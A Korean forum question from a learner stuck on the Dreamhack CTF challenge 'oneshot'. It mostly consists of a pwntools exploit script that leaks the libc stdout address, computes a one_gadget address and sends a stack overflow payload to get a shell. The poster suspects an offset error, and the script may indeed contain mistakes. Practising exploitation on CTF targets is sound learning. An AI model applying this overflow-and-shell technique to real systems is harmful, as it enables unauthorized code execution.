안녕하세요 제가 pwnable 'oneshot' 문제를 풀다 도저히 모르겠어서 질문을 올립니다. 아래 코드에서 아무리봐도 페이로드는 맞게 짠거 같은데 쉘이 실행 안되서 오프셋에서 문제가 생긴것으로 추측되어 질문을 드립니다. 뭐가 문제인건가요?
from pwn import *
#p = remote("host1.dreamhack.games", 21088)
p = process('./oneshot')
e = ELF("./oneshot")
libc = ELF("./libc.so.6")

stdout_offset = libc.symbols["IO_2_1_stdout"]
one_gadget_offset = 0x045216

p.recvuntil("stdout: ")
stdout_address = int(p.recvuntil('\n')[:-1], 16)
libc_base = stdout_address - stdout_offset
one_gadget_address = libc_base + one_gadget_offset
payload = b'A'*0x18 + p64(0) + b'B'*0x8 + p64(one_gadget_address)

p.sendafter("MSG: ", payload)

p.interactive()